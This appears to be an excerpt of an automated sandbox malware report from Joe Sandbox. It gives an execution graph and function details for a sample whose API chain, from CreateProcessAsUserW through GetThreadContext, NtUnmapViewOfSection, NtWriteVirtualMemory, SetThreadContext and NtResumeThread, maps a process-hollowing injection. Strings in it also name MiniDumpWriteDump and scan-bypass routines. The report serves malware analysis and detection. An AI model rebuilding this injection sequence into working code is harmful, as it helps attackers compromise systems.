                                                                                                                        execution_graph 25035 29c1c6c 25036 29c1c7c 25035->25036 25037 29c1d04 25035->25037 25038 29c1c89 25036->25038 25039 29c1cc0 25036->25039 25040 29c1d0d 25037->25040 25041 29c1f58 25037->25041 25043 29c1c94 25038->25043 25083 29c1724 25038->25083 25042 29c1724 10 API calls 25039->25042 25045 29c1d25 25040->25045 25059 29c1e24 25040->25059 25044 29c1fec 25041->25044 25047 29c1fac 25041->25047 25048 29c1f68 25041->25048 25065 29c1cd7 25042->25065 25050 29c1d2c 25045->25050 25051 29c1d48 25045->25051 25056 29c1dfc 25045->25056 25053 29c1fb2 25047->25053 25057 29c1724 10 API calls 25047->25057 25054 29c1724 10 API calls 25048->25054 25049 29c1e7c 25055 29c1724 10 API calls 25049->25055 25058 29c1e95 25049->25058 25062 29c1d79 Sleep 25051->25062 25072 29c1d9c 25051->25072 25052 29c1cfd 25071 29c1f82 25054->25071 25069 29c1f2c 25055->25069 25060 29c1724 10 API calls 25056->25060 25063 29c1fc1 25057->25063 25059->25049 25059->25058 25061 29c1e55 Sleep 25059->25061 25064 29c1e05 25060->25064 25061->25049 25066 29c1e6f Sleep 25061->25066 25067 29c1d91 Sleep 25062->25067 25062->25072 25079 29c1fa7 25063->25079 25080 29c1a8c 8 API calls 25063->25080 25078 29c1a8c 8 API calls 25064->25078 25082 29c1e1d 25064->25082 25065->25052 25070 29c1a8c 8 API calls 25065->25070 25066->25059 25067->25051 25068 29c1ca1 25074 29c1cb9 25068->25074 25107 29c1a8c 25068->25107 25069->25058 25075 29c1a8c 8 API calls 25069->25075 25070->25052 25076 29c1a8c 8 API calls 25071->25076 25071->25079 25077 29c1f50 25075->25077 25076->25079 25078->25082 25081 29c1fe4 25080->25081 25084 29c173c 25083->25084 25085 29c1968 25083->25085 25096 29c17cb Sleep 25084->25096 25098 29c174e 25084->25098 25086 29c1a80 25085->25086 25087 29c1938 25085->25087 25089 29c1a89 25086->25089 25090 29c1684 VirtualAlloc 25086->25090 25091 29c1947 Sleep 25087->25091 25101 29c1986 25087->25101 25088 29c175d 25088->25068 25089->25068 25092 29c16bf 25090->25092 25093 29c16af 25090->25093 25094 29c195d Sleep 25091->25094 25091->25101 25092->25068 25124 29c1644 25093->25124 25094->25087 25096->25098 25100 29c17e4 Sleep 25096->25100 25097 29c182c 25106 29c1838 25097->25106 25130 29c15cc 25097->25130 25098->25088 25098->25097 25099 29c180a Sleep 25098->25099 25099->25097 25103 29c1820 Sleep 25099->25103 25100->25084 25102 29c15cc VirtualAlloc 25101->25102 25104 29c19a4 25101->25104 25102->25104 25103->25098 25104->25068 25106->25068 25108 29c1b6c 25107->25108 25109 29c1aa1 25107->25109 25110 29c16e8 25108->25110 25111 29c1aa7 25108->25111 25109->25111 25113 29c1b13 Sleep 25109->25113 25112 29c1c66 25110->25112 25117 29c1644 2 API calls 25110->25117 25115 29c1b4b Sleep 25111->25115 25116 29c1ab0 25111->25116 25121 29c1b81 25111->25121 25112->25074 25113->25111 25114 29c1b2d Sleep 25113->25114 25114->25109 25118 29c1b61 Sleep 25115->25118 25115->25121 25116->25074 25119 29c16f5 VirtualFree 25117->25119 25118->25111 25120 29c170d 25119->25120 25120->25074 25122 29c1c00 VirtualFree 25121->25122 25123 29c1ba4 25121->25123 25122->25074 25123->25074 25125 29c1681 25124->25125 25126 29c164d 25124->25126 25125->25092 25126->25125 25127 29c164f Sleep 25126->25127 25128 29c1664 25127->25128 25128->25125 25129 29c1668 Sleep 25128->25129 25129->25126 25134 29c1560 25130->25134 25132 29c15d4 VirtualAlloc 25133 29c15eb 25132->25133 25133->25106 25135 29c1500 25134->25135 25135->25132 25136 29ec2fc 25146 29c6518 25136->25146 25140 29ec32a 25151 29ebb50 timeSetEvent 25140->25151 25142 29ec334 25143 29ec342 GetMessageA 25142->25143 25144 29ec336 TranslateMessage DispatchMessageA 25143->25144 25145 29ec352 25143->25145 25144->25143 25147 29c6523 25146->25147 25152 29c4168 25147->25152 25150 29c427c SysAllocStringLen SysFreeString SysReAllocStringLen 25150->25140 25151->25142 25153 29c41ae 25152->25153 25154 29c43b8 25153->25154 25155 29c4227 25153->25155 25158 29c43e9 25154->25158 25161 29c43fa 25154->25161 25166 29c4100 25155->25166 25171 29c432c GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 25158->25171 25160 29c43f3 25160->25161 25162 29c443f FreeLibrary 25161->25162 25163 29c4463 25161->25163 25162->25161 25164 29c446c 25163->25164 25165 29c4472 ExitProcess 25163->25165 25164->25165 25167 29c4110 25166->25167 25168 29c4143 25166->25168 25167->25168 25169 29c15cc VirtualAlloc 25167->25169 25172 29c5814 25167->25172 25168->25150 25169->25167 25171->25160 25173 29c5840 25172->25173 25174 29c5824 GetModuleFileNameA 25172->25174 25173->25167 25176 29c5a78 GetModuleFileNameA RegOpenKeyExA 25174->25176 25177 29c5afb 25176->25177 25178 29c5abb RegOpenKeyExA 25176->25178 25194 29c58b4 12 API calls 25177->25194 25178->25177 25179 29c5ad9 RegOpenKeyExA 25178->25179 25179->25177 25182 29c5b84 lstrcpynA GetThreadLocale GetLocaleInfoA 25179->25182 25181 29c5b20 RegQueryValueExA 25183 29c5b40 RegQueryValueExA 25181->25183 25184 29c5b5e RegCloseKey 25181->25184 25185 29c5c9e 25182->25185 25186 29c5bbb 25182->25186 25183->25184 25184->25173 25185->25173 25186->25185 25188 29c5bcb lstrlenA 25186->25188 25189 29c5be3 25188->25189 25189->25185 25190 29c5c08 lstrcpynA LoadLibraryExA 25189->25190 25191 29c5c30 25189->25191 25190->25191 25191->25185 25192 29c5c3a lstrcpynA LoadLibraryExA 25191->25192 25192->25185 25193 29c5c6c lstrcpynA LoadLibraryExA 25192->25193 25193->25185 25194->25181 25195 29c4e88 25196 29c4e95 25195->25196 25200 29c4e9c 25195->25200 25204 29c4bdc SysAllocStringLen 25196->25204 25201 29c4bfc 25200->25201 25202 29c4c08 25201->25202 25203 29c4c02 SysFreeString 25201->25203 25203->25202 25204->25200 25205 29e67c4 26022 29c480c 25205->26022 26023 29c481d 26022->26023 26024 29c485a 26023->26024 26025 29c4843 26023->26025 26040 29c4570 26024->26040 26031 29c4b78 26025->26031 26028 29c4850 26029 29c488b 26028->26029 26045 29c4500 26028->26045 26034 29c4b85 26031->26034 26038 29c4bb5 26031->26038 26033 29c4bae 26035 29c4570 11 API calls 26033->26035 26034->26033 26037 29c4b91 26034->26037 26035->26038 26036 29c4b9f 26036->26028 26051 29c2c44 11 API calls 26037->26051 26052 29c44ac 26038->26052 26041 29c4598 26040->26041 26042 29c4574 26040->26042 26041->26028 26065 29c2c10 26042->26065 26044 29c4581 26044->26028 26046 29c4504 26045->26046 26047 29c4514 26045->26047 26046->26047 26049 29c4570 11 API calls 26046->26049 26048 29c4542 26047->26048 26050 29c2c2c 11 API calls 26047->26050 26048->26029 26049->26047 26050->26048 26051->26036 26053 29c44cd 26052->26053 26054 29c44b2 26052->26054 26053->26036 26054->26053 26056 29c2c2c 26054->26056 26057 29c2c3a 26056->26057 26058 29c2c30 26056->26058 26057->26053 26058->26057 26059 29c2d19 26058->26059 26063 29c64cc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 26058->26063 26064 29c2ce8 7 API calls 26059->26064 26062 29c2d3a 26062->26053 26063->26059 26064->26062 26066 29c2c27 26065->26066 26068 29c2c14 26065->26068 26066->26044 26067 29c2c1e 26067->26044 26068->26067 26069 29c2d19 26068->26069 26073 29c64cc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 26068->26073 26074 29c2ce8 7 API calls 26069->26074 26072 29c2d3a 26072->26044 26073->26069 26074->26072 26075 29ebb44 26078 29dec74 26075->26078 26079 29dec7c 26078->26079 26079->26079 29064 29d870c LoadLibraryW 26079->29064 26081 29dec9e 29069 29c2ee0 QueryPerformanceCounter 26081->29069 26083 29deca3 26084 29decad InetIsOffline 26083->26084 26085 29decc8 26084->26085 26086 29decb7 26084->26086 26087 29c4500 11 API calls 26085->26087 26088 29c4500 11 API calls 26086->26088 26089 29decc6 26087->26089 26088->26089 26090 29c480c 11 API calls 26089->26090 26091 29decf5 26090->26091 26092 29decfd 26091->26092 29072 29c4798 26092->29072 26094 29ded20 26095 29ded28 26094->26095 26096 29ded32 26095->26096 29087 29d8824 26096->29087 26099 29c480c 11 API calls 26100 29ded59 26099->26100 26101 29ded61 26100->26101 26102 29c4798 11 API calls 26101->26102 26103 29ded84 26102->26103 26104 29ded8c 26103->26104 29100 29c46a4 26104->29100 29102 29d80c8 29064->29102 29066 29d8745 29113 29d7d00 29066->29113 29070 29c2eed 29069->29070 29071 29c2ef8 GetTickCount 29069->29071 29070->26083 29071->26083 29073 29c479c 29072->29073 29074 29c47fd 29072->29074 29075 29c47a4 29073->29075 29076 29c4500 29073->29076 29075->29074 29077 29c47b3 29075->29077 29079 29c4500 11 API calls 29075->29079 29080 29c4570 11 API calls 29076->29080 29082 29c4514 29076->29082 29081 29c4570 11 API calls 29077->29081 29078 29c4542 29078->26094 29079->29077 29080->29082 29084 29c47cd 29081->29084 29082->29078 29083 29c2c2c 11 API calls 29082->29083 29083->29078 29085 29c4500 11 API calls 29084->29085 29086 29c47f9 29085->29086 29086->26094 29088 29d8838 29087->29088 29089 29d8857 LoadLibraryA 29088->29089 29090 29d8867 29089->29090 29091 29d8020 17 API calls 29090->29091 29092 29d886d 29091->29092 29093 29d80c8 15 API calls 29092->29093 29094 29d8886 29093->29094 29095 29d7d00 18 API calls 29094->29095 29096 29d88e5 FreeLibrary 29095->29096 29097 29d88fd 29096->29097 29098 29c44d0 11 API calls 29097->29098 29099 29d890a 29098->29099 29099->26099 29101 29c46aa 29100->29101 29103 29c4500 11 API calls 29102->29103 29104 29d80ed 29103->29104 29127 29d7914 29104->29127 29107 29c4798 11 API calls 29108 29d8107 29107->29108 29109 29d810f GetModuleHandleW GetProcAddress GetProcAddress 29108->29109 29110 29d8142 29109->29110 29133 29c44d0 29110->29133 29114 29c4500 11 API calls 29113->29114 29115 29d7d25 29114->29115 29116 29d7914 12 API calls 29115->29116 29117 29d7d32 29116->29117 29118 29c4798 11 API calls 29117->29118 29119 29d7d42 29118->29119 29138 29d8020 29119->29138 29122 29d80c8 15 API calls 29123 29d7d5b NtWriteVirtualMemory 29122->29123 29124 29d7d87 29123->29124 29125 29c44d0 11 API calls 29124->29125 29126 29d7d94 FreeLibrary 29125->29126 29126->26081 29128 29d7925 29127->29128 29129 29c4b78 11 API calls 29128->29129 29131 29d7935 29129->29131 29130 29d79a1 29130->29107 29131->29130 29137 29cba44 CharNextA 29131->29137 29135 29c44d6 29133->29135 29134 29c44fc 29134->29066 29135->29134 29136 29c2c2c 11 API calls 29135->29136 29136->29135 29137->29131 29139 29c4500 11 API calls 29138->29139 29140 29d8043 29139->29140 29141 29d7914 12 API calls 29140->29141 29142 29d8050 29141->29142 29143 29d8058 GetModuleHandleA 29142->29143 29144 29d80c8 15 API calls 29143->29144 29145 29d8069 GetModuleHandleA 29144->29145 29146 29d8087 29145->29146 29147 29c44ac 11 API calls 29146->29147 29148 29d7d55 29147->29148 29148->29122

                                                                                                                        Executed Functions

                                                                                                                        Function 029D8BB0 Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1654threadnativeinjectionCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 6797 29d8bb0-29d8bb3 6798 29d8bb8-29d8bbd 6797->6798 6798->6798 6799 29d8bbf-29d8ca6 call 29c493c call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 6798->6799 6830 29d8cac-29d8d87 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 6799->6830 6831 29da6f7-29da761 call 29c44d0 * 2 call 29c4c0c call 29c44d0 call 29c44ac call 29c44d0 * 2 6799->6831 6830->6831 6875 29d8d8d-29d90b5 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c30d4 * 2 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c4d8c call 29c4d9c call 29d85dc 6830->6875 6984 29d9128-29d9449 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c46a4 * 2 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c2ee0 call 29c2f08 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 GetThreadContext 6875->6984 6985 29d90b7-29d9123 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 6875->6985 6984->6831 7093 29d944f-29d96b2 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29d8254 6984->7093 6985->6984 7166 29d99bf-29d9a2b call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 7093->7166 7167 29d96b8-29d9821 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29d84c4 7093->7167 7194 29d9a30-29d9bb0 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29d79b4 7166->7194 7257 29d984b-29d98b7 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 7167->7257 7258 29d9823-29d9849 call 29d79b4 7167->7258 7194->6831 7298 29d9bb6-29d9caf call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29d8ac0 7194->7298 7265 29d98bc-29d99b3 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29d79b4 7257->7265 7258->7265 7337 29d99b8-29d99bd 7265->7337 7349 29d9cb1-29d9cfe call 29d89b8 call 29d89ac 7298->7349 7350 29d9d03-29da45b call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29d7d00 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29d7d00 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 SetThreadContext NtResumeThread call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c2c2c call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29d87a0 * 3 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 7298->7350 7337->7194 7349->7350 7575 29da460-29da6f2 call 29d87a0 * 2 call 29c480c call 29c494c call 29c4798 call 29c494c call 29d87a0 call 29c480c call 29c494c call 29c4798 call 29c494c call 29d87a0 * 5 call 29c480c call 29c494c call 29c4798 call 29c494c call 29d87a0 call 29c480c call 29c494c call 29c4798 call 29c494c call 29d87a0 call 29c480c call 29c494c call 29c4798 call 29c494c call 29d87a0 call 29c480c call 29c494c call 29c4798 call 29c494c call 29d87a0 call 29d7ed4 call 29d87a0 * 2 7350->7575 7575->6831
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 029D8824: LoadLibraryA.KERNEL32(00000000,00000000,029D890B), ref: 029D8858
                                                                                                                          • Part of subcall function 029D8824: FreeLibrary.KERNEL32(74B10000,00000000,02A21388,Function_000065D8,00000004,02A21398,02A21388,05F5E0FF,00000040,02A2139C,74B10000,00000000,00000000,00000000,00000000,029D890B), ref: 029D88EB
                                                                                                                          • Part of subcall function 029D85DC: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 029D8668
                                                                                                                        • GetThreadContext.KERNEL32(00000860,02A21420,ScanString,02A213A4,029DA77C,UacInitialize,02A213A4,029DA77C,ScanBuffer,02A213A4,029DA77C,ScanBuffer,02A213A4,029DA77C,UacInitialize,02A213A4), ref: 029D9442
                                                                                                                          • Part of subcall function 029D8254: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 029D82C5
                                                                                                                          • Part of subcall function 029D84C4: NtUnmapViewOfSection.NTDLL(?,?), ref: 029D8529
                                                                                                                          • Part of subcall function 029D79B4: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 029D7A27
                                                                                                                          • Part of subcall function 029D7D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 029D7D74
                                                                                                                        • SetThreadContext.KERNEL32(00000860,02A21420,ScanBuffer,02A213A4,029DA77C,ScanString,02A213A4,029DA77C,Initialize,02A213A4,029DA77C,00000870,0036BFF8,02A214F8,00000004,02A214FC), ref: 029DA157
                                                                                                                        • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000860,00000000,00000860,02A21420,ScanBuffer,02A213A4,029DA77C,ScanString,02A213A4,029DA77C,Initialize,02A213A4,029DA77C,00000870,0036BFF8,02A214F8), ref: 029DA164
                                                                                                                          • Part of subcall function 029D87A0: LoadLibraryW.KERNEL32(bcrypt,?,00000860,00000000,02A213A4,029DA3C7,ScanString,02A213A4,029DA77C,ScanBuffer,02A213A4,029DA77C,Initialize,02A213A4,029DA77C,UacScan), ref: 029D87B4
                                                                                                                          • Part of subcall function 029D87A0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 029D87CE
                                                                                                                          • Part of subcall function 029D87A0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000860,00000000,02A213A4,029DA3C7,ScanString,02A213A4,029DA77C,ScanBuffer,02A213A4,029DA77C,Initialize), ref: 029D880A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$MemoryThreadVirtual$ContextFreeLoad$AddressAllocateCreateProcProcessReadResumeSectionUnmapUserViewWrite
                                                                                                                        • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                                        • API String ID: 1022112746-51457883
                                                                                                                        • Opcode ID: d92084f225c9117178e6b353cea829ef0de14e5dfe06ef1c59b74f520bab1ba2
                                                                                                                        • Instruction ID: 3f4a4d951d8606a5af7e6c4cd7a11e5f9a2f716f4ce8f76c6f58227423ead3b6
                                                                                                                        • Opcode Fuzzy Hash: d92084f225c9117178e6b353cea829ef0de14e5dfe06ef1c59b74f520bab1ba2
                                                                                                                        • Instruction Fuzzy Hash: 8CE21E35B501189BDB11FB64CDA0BDE73FAAFC9310F2090A5E009AB255DB30EE569F52
                                                                                                                        Function 029D8BAE Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1605threadCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 7653 29d8bae-29d8bb3 7655 29d8bb8-29d8bbd 7653->7655 7655->7655 7656 29d8bbf-29d8ca6 call 29c493c call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 7655->7656 7687 29d8cac-29d8d87 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 7656->7687 7688 29da6f7-29da761 call 29c44d0 * 2 call 29c4c0c call 29c44d0 call 29c44ac call 29c44d0 * 2 7656->7688 7687->7688 7732 29d8d8d-29d90b5 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c30d4 * 2 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c4d8c call 29c4d9c call 29d85dc 7687->7732 7841 29d9128-29d9449 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c46a4 * 2 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c2ee0 call 29c2f08 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 GetThreadContext 7732->7841 7842 29d90b7-29d9123 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 7732->7842 7841->7688 7950 29d944f-29d96b2 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29d8254 7841->7950 7842->7841 8023 29d99bf-29d9a2b call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 7950->8023 8024 29d96b8-29d9821 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29d84c4 7950->8024 8051 29d9a30-29d9bb0 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29d79b4 8023->8051 8114 29d984b-29d98b7 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 8024->8114 8115 29d9823-29d9849 call 29d79b4 8024->8115 8051->7688 8155 29d9bb6-29d9caf call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29d8ac0 8051->8155 8122 29d98bc-29d99bd call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29d79b4 8114->8122 8115->8122 8122->8051 8206 29d9cb1-29d9cfe call 29d89b8 call 29d89ac 8155->8206 8207 29d9d03-29da6f2 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29d7d00 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29d7d00 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 SetThreadContext NtResumeThread call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c2c2c call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29d87a0 * 3 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29d87a0 * 2 call 29c480c call 29c494c call 29c4798 call 29c494c call 29d87a0 call 29c480c call 29c494c call 29c4798 call 29c494c call 29d87a0 * 5 call 29c480c call 29c494c call 29c4798 call 29c494c call 29d87a0 call 29c480c call 29c494c call 29c4798 call 29c494c call 29d87a0 call 29c480c call 29c494c call 29c4798 call 29c494c call 29d87a0 call 29c480c call 29c494c call 29c4798 call 29c494c call 29d87a0 call 29d7ed4 call 29d87a0 * 2 8155->8207 8206->8207 8207->7688
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 029D8824: LoadLibraryA.KERNEL32(00000000,00000000,029D890B), ref: 029D8858
